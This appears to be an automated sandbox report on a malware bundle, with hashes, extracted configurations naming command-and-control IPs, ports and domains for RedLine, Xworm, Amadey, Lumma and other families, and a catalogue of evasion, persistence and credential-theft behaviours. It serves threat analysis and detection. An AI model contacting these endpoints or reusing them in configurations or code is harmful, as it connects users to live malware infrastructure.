amadey | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
146s
max time network
345s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
23-06-2024 11:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Family

redline

Botnet

LiveTraffic

4.185.27.237:13528

Extracted

Family

redline

Botnet

AMA

185.215.113.67:40960

Extracted

Family

xworm

Version

5.0

64.226.123.178:6098

Mutex

1z0ENxCLSR3XRSre

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

loaderbot

https://cv99160.tw1.ru/cmd.php

Extracted

Family

redline

Botnet

0011

185.91.127.219:33455

Extracted

Family

xworm

Version

3.1

200.9.155.204:7000

Mutex

vzUmpEGHgtkl8VDB

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

risepro

77.91.77.66:58709

Extracted

Family

redline

Botnet

newbild

185.215.113.67:40960

Extracted

Family

lumma

https://disappointcredisotw.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://doughtdrillyksow.shop/api

https://facilitycoursedw.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/6548-1369-0x0000000000810000-0x0000000000846000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Roaming\XClient.exe	family_xworm
behavioral1/memory/5908-1706-0x00000000006A0000-0x00000000006AE000-memory.dmp	family_xworm

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Phorphiex payload 1 IoCs

Processes:

resource	yara_rule
C:\Windows\sysmablsvr.exe	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4820-1285-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
C:\Users\Admin\Desktop\a\ama.exe	family_redline
behavioral1/memory/3708-1338-0x0000000000420000-0x0000000000470000-memory.dmp	family_redline
C:\Users\Admin\AppData\Roaming\ccleanerfile.exe	family_redline
behavioral1/memory/2052-1705-0x0000000000460000-0x00000000004B0000-memory.dmp	family_redline
C:\Users\Admin\Desktop\Files\redline123123.exe	family_redline
behavioral1/memory/7600-19912-0x0000000000BC0000-0x0000000000C10000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

7.exeaxplong.exelimba.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	limba.exe

LoaderBot executable 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe	loaderbot
behavioral1/memory/6272-1537-0x00000000003F0000-0x00000000007EE000-memory.dmp	loaderbot

Command and Scripting Interpreter: PowerShell 1 TTPs 55 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
6112	powershell.exe
8000	powershell.exe
7568	powershell.exe
5076	powershell.exe
5220	powershell.exe
7596	powershell.exe
4892	powershell.exe
6928	powershell.exe
4324	powershell.exe
1612	powershell.exe
6044	powershell.exe
6740	powershell.exe
6724	powershell.exe
440	powershell.exe
6540	powershell.exe
8072	powershell.exe
6348	powershell.exe
5980	powershell.exe
2944	powershell.exe
6340	powershell.exe
7652	powershell.exe
5412	powershell.exe
6568	powershell.exe
4328	powershell.exe
5312	powershell.exe
4488	powershell.exe
4928	powershell.exe
872	powershell.exe
4532	powershell.exe
8108	powershell.exe
2216	powershell.exe
4900	powershell.exe
6856	powershell.exe
988	powershell.exe
8000	powershell.exe
2128	powershell.exe
2140	powershell.exe
6820	powershell.exe
2128	powershell.exe
5992	powershell.exe
7248	powershell.exe
1612	powershell.exe
6544	powershell.exe
8096	powershell.exe
3560	powershell.exe
2764	powershell.exe
4324	powershell.exe
872	powershell.exe
1124	powershell.exe
5552	powershell.exe
5928	powershell.exe
4344	powershell.exe
6804	powershell.exe
4388	powershell.exe
7736	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

limba.exe7.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	limba.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	limba.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4363463463464363463463463.exesvchost.exeChatLife.exeama.exeBuildTotale.exeserieta.exe0x3fg.exepic1.exerolex.execleaner.exe7.exeNew Text Document mod.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	ChatLife.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	ama.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	BuildTotale.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	serieta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	0x3fg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	pic1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	rolex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	cleaner.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe

Drops startup file 1 IoCs

Processes:

yondex.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url yondex.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	yondex.exe

Executes dropped EXE 57 IoCs

Processes:

New Text Document mod.exe4363463463464363463463463.exeuYtF.exeserieta.exe0x3fg.exenatura.exenautr.exeNotepad.exeNotepad.exeHkbsse.exeNotepad.exeNotepad.exesetup.exesetup.exewfbrmcwrltkl.exeBuildTotale.exesupportoxmr.exeDRIVEapplet.exeetc test.exeNotepad.exegold.exeNotepad.exetaskweaker.exe%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exeama.exesetup222.exelook.exeFirstZ.exelook.exeetuamactyjne.exepseaptzkxyms.exepic1.exeSetupWizard.exeSetupWizard.exesvchost.exewinsvc.exeepitheliogeneticTFr.exerolex.exeHkbsse.exeJufrxnb.exeyondex.exeJufrxnb.exeJufrxnb.exeJufrxnb.exepic15.exelimba.exeChatLife.exe1.exegui.execleaner.execcleanerfile.exeXClient.exe6.exeesfowblknspo.exewsfekkbdzjcc.exe7.exeaxplong.exe

pid	process
936	New Text Document mod.exe
6316	4363463463464363463463463.exe
6484	uYtF.exe
6840	serieta.exe
6952	0x3fg.exe
3524	natura.exe
3216	nautr.exe
3900	Notepad.exe
1124	Notepad.exe
1544	Hkbsse.exe
5324	Notepad.exe
5280	Notepad.exe
2924	setup.exe
2444	setup.exe
5888	wfbrmcwrltkl.exe
2628	BuildTotale.exe
4640	supportoxmr.exe
3936	DRIVEapplet.exe
3428	etc test.exe
6296	Notepad.exe
3940	gold.exe
6880	Notepad.exe
3628	taskweaker.exe
5256	%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe
3708	ama.exe
5240	setup222.exe
5476	look.exe
6240	FirstZ.exe
6548	look.exe
2364	etuamactyjne.exe
5780	pseaptzkxyms.exe
6052	pic1.exe
3152	SetupWizard.exe
7108	SetupWizard.exe
6840	svchost.exe
1084	winsvc.exe
1196	epitheliogeneticTFr.exe
5236	rolex.exe
6232	Hkbsse.exe
3188	Jufrxnb.exe
6272	yondex.exe
5632	Jufrxnb.exe
1824	Jufrxnb.exe
4904	Jufrxnb.exe
208	pic15.exe
4984	limba.exe
5316	ChatLife.exe
1408	1.exe
3080	gui.exe
2208	cleaner.exe
2052	ccleanerfile.exe
5908	XClient.exe
3220	6.exe
6760	esfowblknspo.exe
1708	wsfekkbdzjcc.exe
6308	7.exe
4468	axplong.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

7.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine	7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine	axplong.exe

Loads dropped DLL 26 IoCs

Processes:

Notepad.exeNotepad.exeNotepad.exeDRIVEapplet.exe

pid	process
1124	Notepad.exe
1124	Notepad.exe
1124	Notepad.exe
1124	Notepad.exe
1124	Notepad.exe
1124	Notepad.exe
1124	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
5280	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
6880	Notepad.exe
3936	DRIVEapplet.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\a\limba.exe	themida
behavioral1/memory/4984-1591-0x0000000000400000-0x0000000000BFD000-memory.dmp	themida
behavioral1/memory/4984-7613-0x0000000000400000-0x0000000000BFD000-memory.dmp	themida

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Files\AAQ.exe	upx
behavioral1/memory/2764-2167-0x0000000000C50000-0x0000000000E10000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

yondex.exeNotepad.exeNotepad.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\yondex.exe"	yondex.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Notepad.exe"	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Desktop\\a\\Notepad.exe"	Notepad.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

limba.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA limba.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	limba.exe

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Jufrxnb.exe

description	ioc	process
File opened (read-only)	\??\N:	Jufrxnb.exe
File opened (read-only)	\??\T:	Jufrxnb.exe
File opened (read-only)	\??\X:	Jufrxnb.exe
File opened (read-only)	\??\E:	Jufrxnb.exe
File opened (read-only)	\??\L:	Jufrxnb.exe
File opened (read-only)	\??\P:	Jufrxnb.exe
File opened (read-only)	\??\W:	Jufrxnb.exe
File opened (read-only)	\??\Y:	Jufrxnb.exe
File opened (read-only)	\??\Z:	Jufrxnb.exe
File opened (read-only)	\??\H:	Jufrxnb.exe
File opened (read-only)	\??\I:	Jufrxnb.exe
File opened (read-only)	\??\M:	Jufrxnb.exe
File opened (read-only)	\??\R:	Jufrxnb.exe
File opened (read-only)	\??\S:	Jufrxnb.exe
File opened (read-only)	\??\V:	Jufrxnb.exe
File opened (read-only)	\??\B:	Jufrxnb.exe
File opened (read-only)	\??\G:	Jufrxnb.exe
File opened (read-only)	\??\J:	Jufrxnb.exe
File opened (read-only)	\??\K:	Jufrxnb.exe
File opened (read-only)	\??\O:	Jufrxnb.exe
File opened (read-only)	\??\Q:	Jufrxnb.exe
File opened (read-only)	\??\U:	Jufrxnb.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

Processes:

flow	ioc
181	raw.githubusercontent.com
182	raw.githubusercontent.com
257	pastebin.com
396	raw.githubusercontent.com
454	pastebin.com
251	raw.githubusercontent.com
258	pastebin.com
289	pastebin.com
395	raw.githubusercontent.com
453	pastebin.com

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

340 ipinfo.io
341 ipinfo.io

flow	ioc
340	ipinfo.io
341	ipinfo.io

Power Settings 1 TTPs 55 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	process
5556	powercfg.exe
3328	powercfg.exe
2476	powercfg.exe
6748	powercfg.exe
7380	powercfg.exe
5156	powercfg.exe
6456	powercfg.exe
4608	powercfg.exe
2208	powercfg.exe
2140	powercfg.exe
6868	powercfg.exe
6672	powercfg.exe
4376	powercfg.exe
5852	powercfg.exe
1216	powercfg.exe
1980	powercfg.exe
1940	powercfg.exe
6588	powercfg.exe
6512	powercfg.exe
7980	powercfg.exe
6912	powercfg.exe
5184	powercfg.exe
4560	powercfg.exe
6676	powercfg.exe
1720	powercfg.exe
7160	powercfg.exe
2208	powercfg.exe
5600	powercfg.exe
5408	powercfg.exe
5672	powercfg.exe
3080	powercfg.exe
6580	powercfg.exe
8060	powercfg.exe
4416	powercfg.exe
2116	powercfg.exe
5604	powercfg.exe
4472	powercfg.exe
5696	powercfg.exe
4548	powercfg.exe
5464	powercfg.exe
6472	powercfg.exe
5748	powercfg.exe
5680	powercfg.exe
6784	powercfg.exe
6748	powercfg.exe
6292	powercfg.exe
8080	powercfg.exe
5840	powercfg.exe
1300	powercfg.exe
1936	powercfg.exe
5856	powercfg.exe
2232	powercfg.exe
8108	powercfg.exe
8160	powercfg.exe
7020	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/memory/2764-2167-0x0000000000C50000-0x0000000000E10000-memory.dmp	autoit_exe

Drops file in System32 directory 11 IoCs

Processes:

setup.exepowershell.exepowershell.exewsfekkbdzjcc.exeFirstZ.exeesfowblknspo.exeetc test.exesupportoxmr.exe

description	ioc	process
File opened for modification	C:\Windows\system32\winsvc.exe	setup.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	wsfekkbdzjcc.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File opened for modification	C:\Windows\system32\MRT.exe	esfowblknspo.exe
File opened for modification	C:\Windows\System32\.coC99.tmp	setup.exe
File opened for modification	C:\Windows\system32\.coC99.tmp	setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	etc test.exe
File opened for modification	C:\Windows\system32\MRT.exe	supportoxmr.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

7.exeaxplong.exe

pid process

6308 7.exe
4468 axplong.exe

pid	process
6308	7.exe
4468	axplong.exe

Suspicious use of SetThreadContext 12 IoCs

Processes:

wfbrmcwrltkl.exegold.exelook.exeetuamactyjne.exepseaptzkxyms.exeDRIVEapplet.exetaskweaker.exewsfekkbdzjcc.exepic15.exeesfowblknspo.exe

description	pid	process	target process
PID 5888 set thread context of 5976	5888	wfbrmcwrltkl.exe	explorer.exe
PID 3940 set thread context of 4820	3940	gold.exe	RegAsm.exe
PID 5476 set thread context of 6548	5476	look.exe	look.exe
PID 2364 set thread context of 5612	2364	etuamactyjne.exe	conhost.exe
PID 2364 set thread context of 3432	2364	etuamactyjne.exe	conhost.exe
PID 5780 set thread context of 5864	5780	pseaptzkxyms.exe	conhost.exe
PID 3936 set thread context of 6904	3936	DRIVEapplet.exe	Conhost.exe
PID 3628 set thread context of 2444	3628	taskweaker.exe	BitLockerToGo.exe
PID 1708 set thread context of 5880	1708	wsfekkbdzjcc.exe	conhost.exe
PID 1708 set thread context of 2292	1708	wsfekkbdzjcc.exe	conhost.exe
PID 208 set thread context of 4588	208	pic15.exe	BitLockerToGo.exe
PID 6760 set thread context of 2996	6760	esfowblknspo.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe	svchost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe	svchost.exe

Drops file in Windows directory 2 IoCs

Processes:

0x3fg.exe7.exe

description ioc process

File created C:\Windows\Tasks\Hkbsse.job 0x3fg.exe
File created C:\Windows\Tasks\axplong.job 7.exe

description	ioc	process
File created	C:\Windows\Tasks\Hkbsse.job	0x3fg.exe
File created	C:\Windows\Tasks\axplong.job	7.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4692	sc.exe
6904	sc.exe
8172	sc.exe
3924	sc.exe
2164	sc.exe
180	sc.exe
5640	sc.exe
2764	sc.exe
6772	sc.exe
6432	sc.exe
6576	sc.exe
7148	sc.exe
6016	sc.exe
3900	sc.exe
5552	sc.exe
7476	sc.exe
6036	sc.exe
4784	sc.exe
3164	sc.exe
648	sc.exe
396	sc.exe
5368	sc.exe
812	sc.exe
2664	sc.exe
5752	sc.exe
5824	sc.exe
6824	sc.exe
6456	sc.exe
4604	sc.exe
8052	sc.exe
7436	sc.exe
5840	sc.exe
5616	sc.exe
3732	sc.exe
864	sc.exe
7464	sc.exe
5696	sc.exe
6364	sc.exe
7180	sc.exe
4400	sc.exe
7548	sc.exe
5916	sc.exe
4284	sc.exe
3308	sc.exe
7048	sc.exe
6108	sc.exe
5160	sc.exe
2328	sc.exe
6544	sc.exe
7288	sc.exe
4440	sc.exe
4556	sc.exe
5840	sc.exe
1000	sc.exe
4472	sc.exe
5328	sc.exe
4604	sc.exe
7672	sc.exe
5780	sc.exe
3636	sc.exe
5540	sc.exe
964	sc.exe
6600	sc.exe
5684	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Notepad.exe	pyinstaller
C:\Users\Admin\Desktop\Files\hellminer.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4784	6840	WerFault.exe	svchost.exe
3308	5632	WerFault.exe	Jufrxnb.exe
4996	3188	WerFault.exe	Jufrxnb.exe
2640	4904	WerFault.exe	Jufrxnb.exe
864	1408	WerFault.exe	1.exe
3400	6216	WerFault.exe	ghjk.exe
4048	6300	WerFault.exe	svchost.exe
4612	6300	WerFault.exe	svchost.exe
2328	4596	WerFault.exe	nine.exe
4376	4580	WerFault.exe	asdfg.exe
8104	1824	WerFault.exe	Jufrxnb.exe
4640	1996	WerFault.exe	drivermanager.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Files\cluton.exe	nsis_installer_1
C:\Users\Admin\Desktop\Files\cluton.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Jufrxnb.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Jufrxnb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Jufrxnb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Jufrxnb.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3244 timeout.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

3528 tasklist.exe
4964 tasklist.exe
7776 tasklist.exe

pid	process
3244	timeout.exe

pid	process
3528	tasklist.exe
4964	tasklist.exe
7776	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
6924	taskkill.exe
5692	taskkill.exe
6420	taskkill.exe
1164	taskkill.exe
1424	taskkill.exe
2116	taskkill.exe
6780	taskkill.exe
2656	taskkill.exe
5136	taskkill.exe

Modifies Control Panel 26 IoCs

evasion

Processes:

rundll32.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Appearance\Current	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast\High Contrast Scheme	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast\Flags = "126"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast	rundll32.exe
